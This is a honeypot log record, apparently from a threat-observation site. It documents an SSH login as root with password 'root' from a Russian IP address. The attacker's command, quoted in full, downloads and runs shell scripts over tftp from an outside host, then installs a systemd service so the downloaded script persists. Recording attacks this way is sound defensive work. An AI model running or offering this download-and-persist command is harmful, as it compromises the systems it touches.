Time | 2024/11/22, 08:00:01 (GMT) |
Transaction ID | 9JH6JRB2ZUZ666E3 |
Service | ssh |
Location | RU (Russia) |
Attacker | 147.45.47.117 |
Classification | Security execution |
Harm Potential | High |
147.45.47.117 client username 'root' and password 'root' entered 147.45.47.117 client command : 'cd /home && mkdir xbin3 && cd /home/xbin3 || cd /var/run || cd /mnt || cd /root || cd /; tftp 45.125.66.215 -c get tftp1.sh && chmod 777 tftp1.sh && sh tftp1.sh && tftp -r tftp2.sh -g 45.125.66.215 && chmod 777 tftp2.sh && sh tftp2.sh; echo -e "[Unit] Description=My Service [Service] ExecStart=/bin/bash /home/xbin3/tftp1.sh Restart=on-failure [Install] WantedBy=multi-user.target" > /etc/systemd/system/my2_service2.service && chmod 777 /etc/systemd/system/my2_service2.service && chmod +x /home/xbin3/tftp1.sh && systemctl daemon-reload && systemctl start my2_service2.service && systemctl enable my2_service2.service'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |